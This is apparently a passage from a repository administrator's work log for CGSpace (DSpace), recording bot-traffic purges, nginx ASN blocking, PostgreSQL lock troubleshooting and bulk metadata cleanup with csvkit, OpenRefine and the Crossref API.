CPU week

+
    +
  • But still, it’s suspicious that there are so many PostgreSQL locks
  • +
  • Looking at the Solr stats to check the hits the last month (actually I skipped December because I was so busy) +
      +
    • I see 31.148.223.10 is on ALFA TELECOM s.r.o. in Russia and it made 43,000 requests this month (and 400,000 more last month!)
    • +
    • I see 18.203.245.60 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 3.249.192.212 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 34.244.160.145 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 52.213.59.101 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 91.209.8.29 is in Bulgaria on DGM EOOD and is low risk according to Scamlytics, but their user agent is all lower case and it’s a data center ISP so nope
    • +
    • I see 54.78.176.127 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 54.246.128.111 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 54.74.197.53 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 52.16.103.133 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 63.32.99.252 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 176.34.141.181 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 34.243.17.80 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 34.240.206.16 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 18.203.81.120 is on Amazon and it uses weird user agents, different with each request
    • +
    • I see 176.97.210.106 is on Tube Hosting and is rated VERY BAD, malicious, scammy on everything I checked
    • +
    • I see 79.110.73.54 is on ALFA TELCOM / Serverel and is using a different, weird user agent with each request
    • +
    • There are too many to count… so I will purge these and then move on to user agents
    • +
    +
  • +
  • I purged hits from those IPs:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+Purging 439185 hits from 31.148.223.10 in statistics
+Purging 2151 hits from 18.203.245.60 in statistics
+Purging 1990 hits from 3.249.192.212 in statistics
+Purging 1975 hits from 34.244.160.145 in statistics
+Purging 1969 hits from 52.213.59.101 in statistics
+Purging 2540 hits from 91.209.8.29 in statistics
+Purging 1624 hits from 54.78.176.127 in statistics
+Purging 1236 hits from 54.74.197.53 in statistics
+Purging 1327 hits from 54.246.128.111 in statistics
+Purging 1108 hits from 52.16.103.133 in statistics
+Purging 1045 hits from 63.32.99.252 in statistics
+Purging 999 hits from 176.34.141.181 in statistics
+Purging 997 hits from 34.243.17.80 in statistics
+Purging 985 hits from 34.240.206.16 in statistics
+Purging 862 hits from 18.203.81.120 in statistics
+Purging 1654 hits from 176.97.210.106 in statistics
+Purging 1628 hits from 51.81.193.200 in statistics
+Purging 1020 hits from 79.110.73.54 in statistics
+Purging 842 hits from 35.153.105.213 in statistics
+Purging 1689 hits from 54.164.237.125 in statistics
+
+Total number of bot hits purged: 466826
+
    +
  • Looking at user agents in Solr statistics from 2022-12 and 2023-01 I see some weird ones: +
      +
    • azure-logic-apps/1.0 (workflow e1f855704d6543f48be6205c40f4083f; version 08585300079823949478) microsoft-flow/1.0
    • +
    • Gov employment data scraper ([[your email]])
    • +
    • Microsoft.Data.Mashup (https://go.microsoft.com/fwlink/?LinkID=304225)
    • +
    • crownpeak
    • +
    • Mozilla/5.0 (compatible)
    • +
    +
  • +
  • Also, a ton of them are lower case, which I’ve never seen before… it might be possible, but looks super fishy to me: +
      +
    • mozilla/5.0 (x11; ubuntu; linux x86_64; rv:84.0) gecko/20100101 firefox/86.0
    • +
    • mozilla/5.0 (macintosh; intel mac os x 11_3) applewebkit/537.36 (khtml, like gecko) chrome/89.0.4389.90 safari/537.36
    • +
    • mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/86.0.4240.75 safari/537.36
    • +
    • mozilla/5.0 (windows nt 10.0; win64; x64; rv:86.0) gecko/20100101 firefox/86.0
    • +
    • mozilla/5.0 (x11; linux x86_64) applewebkit/537.36 (khtml, like gecko) chrome/90.0.4430.93 safari/537.36
    • +
    • mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/92.0.4515.159 safari/537.36
    • +
    • mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/88.0.4324.104 safari/537.36
    • +
    • mozilla/5.0 (x11; linux x86_64) applewebkit/537.36 (khtml, like gecko) chrome/86.0.4240.75 safari/537.36
    • +
    +
  • +
  • I purged some of those:
  • +
+
$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
+Purging 1658 hits from azure-logic-apps\/1.0 in statistics
+Purging 948 hits from Gov employment data scraper in statistics
+Purging 786 hits from Microsoft\.Data\.Mashup in statistics
+Purging 303 hits from crownpeak in statistics
+Purging 332 hits from Mozilla\/5.0 (compatible) in statistics
+
+Total number of bot hits purged: 4027
+
    +
  • Then I ran all system updates on the server and rebooted it +
      +
    • Hopefully this clears the locks and the nginx mitigation helps with the load from non-human hosts in large data centers
    • +
    • I need to re-work how I’m doing this whitelisting and blacklisting… it’s way too complicated now
    • +
    +
  • +
  • Export entire CGSpace to check Initiative mappings, and add nineteen…
  • +
  • Start a harvest on AReS
  • +
+

2023-01-18

+
    +
  • I’m looking at all the ORCID identifiers in the database, which seem to be way more than I realized:
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=247) to /tmp/2023-01-18-orcid-identifiers.txt;
+COPY 4231
+$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/2023-01-18-orcid-identifiers.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-01-18-orcids.txt
+$ wc -l /tmp/2023-01-18-orcids.txt
+4518 /tmp/2023-01-18-orcids.txt
+
    +
  • Then I resolved them from ORCID and updated them in the database:
  • +
+
$ ./ilri/resolve-orcids.py -i /tmp/2023-01-18-orcids.txt -o /tmp/2023-01-18-orcids-names.txt -d
+$ ./ilri/update-orcids.py -i /tmp/2023-01-18-orcids-names.txt -db dspace -u dspace -p 'fuuu' -m 247
+
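For reference, resolving an ORCID iD to a display name uses ORCID's public API; a minimal sketch (resolve-orcids.py handles batching, errors, and output formatting differently):

import requests

def resolve_orcid_name(orcid: str):
    """Look up the public name for an ORCID iD, or return None."""
    r = requests.get(
        f"https://pub.orcid.org/v3.0/{orcid}/person",
        headers={"Accept": "application/json"},
        timeout=30,
    )
    if r.status_code != 200:
        return None
    name = r.json().get("name") or {}
    given = (name.get("given-names") or {}).get("value", "")
    family = (name.get("family-name") or {}).get("value", "")
    return f"{given} {family}".strip() or None

print(resolve_orcid_name("0000-0002-1825-0097"))  # ORCID's documented example iD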
    +
  • Then I updated the controlled vocabulary
  • +
  • CGSpace became inactive in the afternoon, with a high number of locks, but surprisingly low CPU usage:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+     83 dspaceApi
+   7829 dspaceWeb
+
    +
  • In the DSpace logs I see some weird SQL messages, so I decided to restart PostgreSQL and Tomcat 7… +
      +
    • I hope this doesn’t cause some issue with in-progress workflows…
    • +
    +
  • +
  • I see another user on Cox in the US (98.186.216.144) crawling and scraping XMLUI with Python +
      +
    • I will add python to the list of bad bot user agents in nginx
    • +
    +
  • +
  • While looking into the locks I see some potential Java heap issues +
      +
    • Indeed, I see two out of memory errors in Tomcat’s journal:
    • +
    +
  • +
+
tomcat7[310996]: java.lang.OutOfMemoryError: Java heap space
+tomcat7[310996]: Jan 18, 2023 1:37:03 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
+
    +
  • Which explains why the locks went down to normal numbers as I was watching… (because Java crashed)
  • +
+

2023-01-19

+
    +
  • Update a bunch of ORCID identifiers, Initiative mappings, and regions on CGSpace
  • +
  • So it seems an IFPRI user got caught up in the blocking I did yesterday +
      +
    • Their ISP is Comcast…
    • +
    • I need to re-work the ASN blocking on nginx, but for now I will just get the ASNs again minus Comcast:
    • +
    +
  • +
+
$ wget https://asn.ipinfo.app/api/text/list/AS714 \
+     https://asn.ipinfo.app/api/text/list/AS16276 \
+     https://asn.ipinfo.app/api/text/list/AS15169 \
+     https://asn.ipinfo.app/api/text/list/AS23576 \
+     https://asn.ipinfo.app/api/text/list/AS24940 \
+     https://asn.ipinfo.app/api/text/list/AS13238 \
+     https://asn.ipinfo.app/api/text/list/AS32934 \
+     https://asn.ipinfo.app/api/text/list/AS14061 \
+     https://asn.ipinfo.app/api/text/list/AS12876 \
+     https://asn.ipinfo.app/api/text/list/AS55286 \
+     https://asn.ipinfo.app/api/text/list/AS203020 \
+     https://asn.ipinfo.app/api/text/list/AS204287 \
+     https://asn.ipinfo.app/api/text/list/AS50245 \
+     https://asn.ipinfo.app/api/text/list/AS6939 \
+     https://asn.ipinfo.app/api/text/list/AS16509 \
+     https://asn.ipinfo.app/api/text/list/AS14618
+$ cat AS* | sort | uniq | wc -l
+18179
+$ cat /tmp/AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
+$ wc -l /tmp/networks.txt
+5872 /tmp/networks.txt
+
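mapcidr's aggregation can be approximated with Python's standard library ipaddress module in case it isn't installed; a sketch (the input file name stands in for the concatenated AS* lists):

import ipaddress

with open("/tmp/asn-prefixes.txt") as f:
    networks = [ipaddress.ip_network(line.strip(), strict=False)
                for line in f if line.strip()]

# collapse_addresses merges adjacent and overlapping prefixes, but IPv4 and
# IPv6 have to be collapsed separately
ipv4 = ipaddress.collapse_addresses(n for n in networks if n.version == 4)
ipv6 = ipaddress.collapse_addresses(n for n in networks if n.version == 6)

with open("/tmp/networks.txt", "w") as f:
    for network in list(ipv4) + list(ipv6):
        f.write(f"{network}\n")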

2023-01-20

+
    +
  • A lot of work on CGSpace metadata (ORCID identifiers, regions, and Initiatives)
  • +
  • I noticed that MEL and CGSpace are using slightly different vocabularies for SDGs so I sent an email to Salem and Sara
  • +
+

2023-01-21

+
    +
  • Export the Initiatives community again to perform collection mappings and country/region fixes
  • +
+

2023-01-22

+
    +
  • There has been a high load on the server for a few days, currently 8.0… and I’ve been seeing some PostgreSQL locks stuck all day:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+     11 dspaceApi
+     28 dspaceCli
+    981 dspaceWeb
+
    +
  • Looking at the locks I see they are from this morning at 5:00 AM, which is the dspace checker-email script +
      +
    • Last week I disabled the one that runs at 4:00 AM, but I guess I will experiment with disabling this too…
    • +
    • Then I killed the PIDs of the locks
    • +
    +
  • +
+
$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | less -S
+...
+$ ps auxw | grep 18986
+postgres 1429108  1.9  1.5 3359712 508148 ?      Ss   05:00  13:40 postgres: 12/main: dspace dspace 127.0.0.1(18986) SELECT
+
    +
  • Also, I checked the age of the locks and killed anything over 1 day:
  • +
+
$ psql < locks-age.sql | grep days | less -S
+
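The gist of that check, as a sketch in Python against pg_stat_activity (the real locks-age.sql is more detailed; connection parameters are placeholders):

import psycopg2  # pip install psycopg2-binary

conn = psycopg2.connect(dbname="dspace", user="dspace", password="fuuu", host="localhost")
conn.autocommit = True

with conn.cursor() as cur:
    # Find backends whose transaction has been open for more than one day
    cur.execute("""
        SELECT pid, application_name, state, now() - xact_start AS xact_age
        FROM pg_stat_activity
        WHERE xact_start IS NOT NULL
          AND now() - xact_start > interval '1 day'
    """)
    for pid, app, state, age in cur.fetchall():
        print(f"terminating {pid} ({app}, {state}, transaction open {age})")
        cur.execute("SELECT pg_terminate_backend(%s)", (pid,))

conn.close()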
    +
  • Then I ran all updates on the server and restarted it…
  • +
  • Salem responded to my question about the SDG mismatch between MEL and CGSpace +
      +
    • We agreed to use a version based on the text of this site
    • +
    +
  • +
  • Salem is having issues with some REST API submission / updates +
      +
    • I updated DSpace Test with a recent CGSpace backup and created a super admin user for him to test
    • +
    +
  • +
  • Clean and normalize fifty-eight IFPRI records for batch import to CGSpace +
      +
    • I did a duplicate check and found six, so that’s good!
    • +
    +
  • +
  • I exported the entire CGSpace to check for missing Initiative mappings +
      +
    • Then I exported the Initiatives community to check for missing regions
    • +
    • Then I ran the script to check for missing ORCID identifiers
    • +
    • Then finally, I started a harvest on AReS
    • +
    +
  • +
+

2023-01-23

+
    +
  • Salem found that you can actually harvest everything in DSpace 7 using the discover/browses endpoint
  • +
  • Exported CGSpace again to examine and clean up a bunch of stuff like ISBNs in the ISSN field, DOIs in the URL field, dataset URLs in the DOI field, normalized a bunch of publisher places, fixed some countries and regions, fixed some licenses, etc +
      +
    • I noticed that we still have “North America” as a region, but according to UN M.49 that is the continent, which comprises “Northern America” the region, so I will update our controlled vocabularies and all existing entries
    • +
    • I imported changes to 1,800 items
    • +
    • When it finished five hours later I started a harvest on AReS
    • +
    +
  • +
+

2023-01-24

+
    +
  • Proof and upload seven items for the Rethinking Food Markets Initiative for IFPRI
  • +
  • Export CGSpace to do some minor cleanups, Initiative collection mappings, and region fixes +
      +
    • I also added “CGIAR Trust Fund” to all items with an Initiative in cg.contributor.initiative
    • +
    +
  • +
+

2023-01-25

+
    +
  • Oh shit, the import last night ran for twelve hours and then died:
  • +
+
Error committing changes to database: could not execute statement
+Aborting most recent changes.
+
    +
  • I re-submitted a smaller version without the CGIAR Trust Fund changes for now just so we get the regions and other fixes
  • +
  • Do some work on SAPLING issues for CGSpace, sending a large list of issues we found to the MEL team for items they submitted
  • +
  • Abenet noticed that the number of items in the Initiatives community appears to have dropped by about 2,000 in the XMLUI +
      +
    • We looked on AReS and all the items are still there
    • +
    • I looked in the DSpace log and see around 2,000 messages like this:
    • +
    +
  • +
+
2023-01-25 07:14:59,529 ERROR com.atmire.versioning.ModificationLogger @ Error while writing item to versioning index: c9fac1f2-6b2b-4941-8077-40b7b5c936b6 message:missing required field: epersonID
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: missing required field: epersonID
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
+        at com.atmire.versioning.ModificationLogger.indexItem(ModificationLogger.java:263)
+        at com.atmire.versioning.ModificationConsumer.end(ModificationConsumer.java:134)
+        at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:157)
+        at org.dspace.core.Context.dispatchEvents(Context.java:455)
+        at org.dspace.core.Context.commit(Context.java:424)
+        at org.dspace.core.Context.complete(Context.java:380)
+        at org.dspace.app.bulkedit.MetadataImport.main(MetadataImport.java:1399)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • I filed a ticket with Atmire to ask them
  • +
  • For now I just did a light Discovery reindex (not the full one) and all the items appeared again
  • +
  • Submit an issue to MEL GitHub regarding the capitalization of CRPs: https://github.com/CodeObia/MEL/issues/11133 +
      +
    • I talked to Salem and he said that this is a legacy thing from when CGSpace was using ALL CAPS for most of its metadata. I provided him with our current controlled vocabulary for CRPs and he will update it in MEL.
    • +
    • On that note, Peter and Abenet and I realized that we still have an old field cg.subject.crp with about 450 values in it, but it has not been used for a few years (they are using the old ALL CAPS CRPs)
    • +
    • I exported this list of values to lowercase them and move them to cg.contributor.crp
    • +
    • Even if some items end up with multiple CRPs, they will get de-duplicated when I remove duplicate values soon
    • +
    +
  • +
+
$ ./ilri/fix-metadata-values.py -i /tmp/2023-01-25-fix-crp-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.crp -t correct
+$ ./ilri/move-metadata-values.py -i /tmp/2023-01-25-move-crp-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.crp -t cg.contributor.crp
+
    +
  • After fixing and moving them all, I deleted the cg.subject.crp field from the metadata registry
  • +
  • I realized a smarter way to update the text lang attributes of metadata would be to restrict the query to items that are in the archive and not withdrawn:
  • +
+
UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn) AND (text_lang IS NULL OR text_lang IN ('en', ''));
+
  • I tried that in a transaction and it hung, so I canceled it and rolled back
  • I see some PostgreSQL locks attributed to dspaceApi that were started at 2023-01-25 13:40:04.529087+01 and haven’t changed since then (that’s eight hours ago)
      • I killed the PID…
      • There were also some locks owned by dspaceWeb that were nine and four hours old, so I killed those too…
      • Now Maria was able to archive one submission of hers that was hanging all afternoon, but I still can’t run the update on the text langs…
  • Export entire CGSpace to do Initiative mappings again
  • Started a harvest on AReS
+

2023-01-26

+
    +
  • Export entire CGSpace to do some metadata cleanup on various fields +
      +
    • I also added “CGIAR Trust Fund” to all items in the Initiatives community
    • +
    +
  • +
+

2023-01-27

+
    +
  • Export a list of affiliations in the Initiatives community for Peter, trying a new method to avoid exporting everything from PostgreSQL:
  • +
+
$ dspace metadata-export -i 10568/115087 -f /tmp/2023-01-27-initiatives.csv
+$ csvcut -c 'cg.contributor.affiliation[en_US]' 2023-01-27-initiatives.csv \
+  | sed -e 1d -e 's/^"//' -e 's/"$//' -e 's/||/\n/g' -e '/^$/d'            \
+  | sort | uniq -c | sort -h                                               \
+  | awk 'BEGIN { FS = "^[[:space:]]+[[:digit:]]+[[:space:]]+" } {print $2}'\
+  | sed -e '1i cg.contributor.affiliation' -e 's/^\(.*\)$/"\1"/'           \
+  > /tmp/2023-01-27-initiatives-affiliations.csv
+
    +
  • The first sed command strips the quotes, deletes empty lines, and splits multiple values on “||”
  • +
  • The awk command sets the field separator to something so we can get the second “field” of the sort command, ie:
  • +
+
...
+    309 International Center for Agricultural Research in the Dry Areas
+    412 International Livestock Research Institute
+
    +
  • The second sed command adds the CSV header and quotes back
  • +
  • I did the same for authors and donors and send them to Peter to make corrections
  • +
+

2023-01-28

+
    +
  • Daniel from the Alliance said they are getting an HTTP 401 when trying to submit items to CGSpace via the REST API
  • +
+

2023-01-29

+
    +
  • Export the entire CGSpace to do Initiatives collection mappings
  • +
  • I was thinking about a way to use Crossref’s API to enrich our data, for example checking registered DOIs for license information, publishers, etc +
      +
    • Turns out I had already written crossref-doi-lookup.py last year, and it works
    • +
    • I exported a list of all DOIs without licenses from CGSpace, minus the CIFOR ones because I know they aren’t registered on Crossref, which is about 11,800 DOIs
    • +
    +
  • +
+
$ csvcut -c 'cg.identifier.doi[en_US]' ~/Downloads/2023-01-29-CGSpace-DOIs-without-licenses.csv \
+  | csvgrep -c 'cg.identifier.doi[en_US]' -r '.*cifor.*' -i \
+  | sed 1d > /tmp/2023-01-29-dois.txt
+$ wc -l /tmp/2023-01-29-dois.txt
+11819 /tmp/2023-01-29-dois.txt
+$ ./ilri/crossref-doi-lookup.py -e a.orth@cgiar.org -i /tmp/2023-01-29-dois.txt -o /tmp/crossref-results.csv
+$ csvcut -c 'id,cg.identifier.doi[en_US]' ~/Downloads/2023-01-29-CGSpace-DOIs-without-licenses.csv \
+  | sed -e 's_https://doi.org/__g' -e 's_https://dx.doi.org/__g' -e 's/cg.identifier.doi\[en_US\]/doi/' \
+  > /tmp/cgspace-temp.csv
+$ csvjoin -c doi /tmp/cgspace-temp.csv /tmp/crossref-results.csv \
+  | csvgrep -c license -r 'creative' \
+  | sed '1s/license/dcterms.license[en_US]/' \
+  | csvcut -c id,license > /tmp/2023-01-29-new-licenses.csv
+
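Under the hood the license check is just a GET per DOI against the Crossref REST API; a minimal sketch of that lookup (crossref-doi-lookup.py does more, like writing the CSV that gets joined above):

import requests

def crossref_licenses(doi: str, mailto: str = "a.orth@cgiar.org"):
    """Return the license URLs Crossref has registered for a DOI, if any."""
    r = requests.get(
        f"https://api.crossref.org/works/{doi}",
        params={"mailto": mailto},  # identifies us to Crossref's "polite" pool
        timeout=30,
    )
    if r.status_code != 200:
        return []
    message = r.json()["message"]
    return [license_["URL"] for license_ in message.get("license", [])]

# print(crossref_licenses("10.xxxx/some-doi"))  # replace with a real DOI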
    +
  • The above was done with just 5,000 DOIs because it was taking a long time, but after the last step I imported into OpenRefine to clean up the license URLs +
      +
    • Then I imported 635 new licenses to CGSpace woooo
    • +
    • After checking the remaining 6,500 DOIs there were another 852 new licenses, woooo
    • +
    +
  • +
  • Peter finished the corrections on affiliations, authors, and donors +
      +
    • I quickly checked them and applied each on CGSpace
    • +
    +
  • +
  • Start a harvest on AReS
  • +
+

2023-01-30

+
    +
  • Run the thumbnail fixer tasks on the Initiatives collections:
  • +
+
$ chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixLowQualityThumbnails 10568/115087 | tee -a /tmp/FixLowQualityThumbnails.log
+$ grep -c remove /tmp/FixLowQualityThumbnails.log
+16
+$ chrt -b 0 dspace dsrun io.github.ilri.cgspace.scripts.FixJpgJpgThumbnails 10568/115087 | tee -a /tmp/FixJpgJpgThumbnails.log
+$ grep -c replacing /tmp/FixJpgJpgThumbnails.log 
+13
+

2023-01-31

+
    +
  • Someone from the Google Scholar team contacted us to ask why Googlebot is blocked from crawling CGSpace +
      +
    • I said that I blocked them because they crawl haphazardly and we had high load during PRMS reporting
    • +
    • Now I will unblock their ASN15169 in nginx…
    • +
    • I urged them to be smarter about crawling since we’re a small team and they are a huge engineering company
    • +
    +
  • +
  • I removed their ASN and regenerated my list from 2023-01-17:
  • +
+
$ wget https://asn.ipinfo.app/api/text/list/AS714 \
+     https://asn.ipinfo.app/api/text/list/AS16276 \
+     https://asn.ipinfo.app/api/text/list/AS23576 \
+     https://asn.ipinfo.app/api/text/list/AS24940 \
+     https://asn.ipinfo.app/api/text/list/AS13238 \
+     https://asn.ipinfo.app/api/text/list/AS32934 \
+     https://asn.ipinfo.app/api/text/list/AS14061 \
+     https://asn.ipinfo.app/api/text/list/AS12876 \
+     https://asn.ipinfo.app/api/text/list/AS55286 \
+     https://asn.ipinfo.app/api/text/list/AS203020 \
+     https://asn.ipinfo.app/api/text/list/AS204287 \
+     https://asn.ipinfo.app/api/text/list/AS50245 \
+     https://asn.ipinfo.app/api/text/list/AS6939 \
+     https://asn.ipinfo.app/api/text/list/AS16509 \
+     https://asn.ipinfo.app/api/text/list/AS14618
+$ cat AS* | sort | uniq | wc -l
+17134
+$ cat /tmp/AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
+
    +
  • Then I updated nginx…
  • +
  • Re-run the scripts to delete duplicate metadata values and update item timestamps that I originally used in 2022-11 +
      +
    • This was about 650 duplicate metadata values…
    • +
    +
  • +
  • Exported CGSpace to do some metadata interrogation in OpenRefine +
      +
    • I looked at items that are set as Limited Access but have Creative Commons licenses
    • +
    • I filtered ~150 that had DOIs and checked them on the Crossref API using crossref-doi-lookup.py
    • +
    • Of those, only about five or so were incorrectly marked as having Creative Commons licenses, so I set those to copyrighted
    • +
    • For the rest, I set them to Open Access
    • +
    +
  • +
  • Start a harvest on AReS
  • +

February, 2023

+

2023-02-01

+
    +
  • Export CGSpace to cross check the DOI metadata with Crossref +
      +
    • I want to try to expand my use of their data to journals, publishers, volumes, issues, etc…
    • +
    +
  • +
+
    +
  • First, extract a list of DOIs for use with crossref-doi-lookup.py:
  • +
+
$ csvcut -c 'cg.identifier.doi[en_US]' ~/Downloads/2023-02-01-cgspace.csv \
+  | csvgrep -c 1 -m 'doi.org' \
+  | csvgrep -c 1 -m ' ' -i \
+  | csvgrep -c 1 -r '.*cifor.*' -i \
+  | sed 1d > /tmp/2023-02-01-dois.txt
+$ ./ilri/crossref-doi-lookup.py -e a.orth@cgiar.org -i /tmp/2023-02-01-dois.txt -o ~/Downloads/2023-01-31-crossref-results.csv -d
+
    +
  • Then extract the ID, DOI, journal, volume, issue, publisher, etc from the CGSpace dump and rename the cg.identifier.doi[en_US] to doi so we can join on it with the Crossref results file:
  • +
+
$ csvcut -c 'id,cg.identifier.doi[en_US],cg.journal[en_US],cg.volume[en_US],cg.issue[en_US],dcterms.publisher[en_US],cg.number[en_US],dcterms.license[en_US]' ~/Downloads/2023-02-01-cgspace.csv \
+  | csvgrep -c 'cg.identifier.doi[en_US]' -r '.*cifor.*' -i \
+  | sed -e '1s/cg.identifier.doi\[en_US\]/doi/' \
+    -e 's_https://doi.org/__g' \
+    -e 's_https://dx.doi.org/__g' \
+  > /tmp/2023-02-01-cgspace-doi-metadata.csv
+$ csvjoin -c doi /tmp/2023-02-01-cgspace-doi-metadata.csv ~/Downloads/2023-02-01-crossref-results.csv > /tmp/2023-02-01-cgspace-crossref-check.csv
+
    +
  • And import into OpenRefine for analysis and cleaning
  • +
  • I just noticed that Crossref also has types, so we could use that in the future too!
  • +
  • I got a few corrections after examining manually, but I didn’t manage to identify any patterns that I could use to do any automatic matching or cleaning
  • +
+

2023-02-05

+
    +
  • Normalize text lang attributes in PostgreSQL, run a quick Discovery index, and then export CGSpace to check Initiative mappings and countries/regions
  • +
  • Run all system updates on CGSpace (linode18) and reboot it
  • +
+

2023-02-06

+ +

2023-02-07

+
    +
  • IFPRI’s web developer Tony managed to get his Drupal harvester to have a useful user agent:
  • +
+
54.x.x.x - - [06/Feb/2023:10:10:32 +0100] "POST /rest/items/find-by-metadata-field?limit=%22100&offset=0 HTTP/1.1" 200 58855 "-" "IFPRI drupal POST harvester"
+
    +
  • He also noticed that there is no pagination on POST requests to /rest/items/find-by-metadata-field, and that he needs to increase his timeout for requests that return 100+ results, ie:
  • +
+
curl -f -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.actionArea", "value":"Systems Transformation", "language": "en_US"}'
+
    +
  • I need to ask on the DSpace Slack about this POST pagination
  • +
  • Abenet and Udana noticed that the Handle server was not running +
      +
    • Looking in the error.log file I see that the service is complaining about a lock file being present
    • +
    • This is because Linode had to do emergency maintenance on the VM host this morning and the Handle server didn’t shut down properly
    • +
    +
  • +
  • I’m having an issue with poetry update so I spent some time debugging and filed an issue
  • +
  • Proof and import nine items for the Digital Innovation Initiative for IFPRI +
      +
    • There were only some minor issues in the metadata
    • +
    • I also did a duplicate check with check-duplicates.py just in case
    • +
    +
  • +
  • I did some minor updates on csv-metadata-quality +
      +
    • First, to reduce warnings on non-SPDX licenses like “Copyrighted; all rights reserved” and “Other” since they are very common for us and I’m sick of seeing the warnings
    • +
    • Second, to skip whitespace and newline fixes on the abstract field since so many times they are intended
    • +
    +
  • +
+

2023-02-08

+
    +
  • Make some edits to IFPRI records requested by Jawoo and Leigh
  • +
  • Help Alessandra upload a last minute report for SAPLING
  • +
  • Proof and upload twenty-seven IFPRI records to CGSpace +
      +
    • It’s a good thing I did a duplicate check because I found three duplicates!
    • +
    +
  • +
  • Export CGSpace to update Initiative mappings and country/region mappings +
      +
    • Then start a harvest on AReS
    • +
    +
  • +
+

2023-02-09

+
    +
  • Do some minor work on the CSS on the DSpace 7 test
  • +
+

2023-02-10

+
    +
  • I noticed a large number of PostgreSQL locks from dspaceWeb on CGSpace:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+   2033 dspaceWeb
+
    +
  • Looking at the lock age, I see some already 1 day old, including this curious query:
  • +
+
select nextval ('public.registrationdata_seq')
+
    +
  • I killed all locks that were more than a few hours old
  • +
  • Export CGSpace to update Initiative collection mappings
  • +
  • Discuss adding dcterms.available to the submission form +
      +
    • I also looked in the dcterms.description field on CGSpace and found ~1,500 items where there is an indication of an online published date
    • +
    • Using some facets in OpenRefine I narrowed down the ones mentioning “online” and then extracted the dates to a new column:
    • +
    +
  • +
+
cells['dcterms.description[en_US]'].value.replace(/.*?(\d+{2}) ([a-zA-Z]+) (\d+{2}).*/,"$3-$2-$1")
+
    +
  • Then to handle formats like “2022-April-26” and “2021-Nov-11” I used some replacement GRELs (note the order so we don’t replace short patterns in longer strings prematurely):
  • +
+
value.replace("January","01").replace("February","02").replace("March","03").replace("April","04").replace("May","05").replace("June","06").replace("July","07").replace("August","08").replace("September","09").replace("October","10").replace("November","11").replace("December","12")
+value.replace("Jan","01").replace("Feb","02").replace("Mar","03").replace("Apr","04").replace("May","05").replace("Jun","06").replace("Jul","07").replace("Aug","08").replace("Sep","09").replace("Oct","10").replace("Nov","11").replace("Dec","12")
+
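Outside OpenRefine the same month-name normalization could be done with strptime, for example (a sketch; the real descriptions are messier):

from datetime import datetime

def normalize_online_date(value: str):
    """Normalize dates like '2022-April-26' or '2021-Nov-11' to ISO 8601."""
    for fmt in ("%Y-%B-%d", "%Y-%b-%d", "%Y-%m-%d"):
        try:
            return datetime.strptime(value, fmt).strftime("%Y-%m-%d")
        except ValueError:
            continue
    return None

print(normalize_online_date("2022-April-26"))  # 2022-04-26
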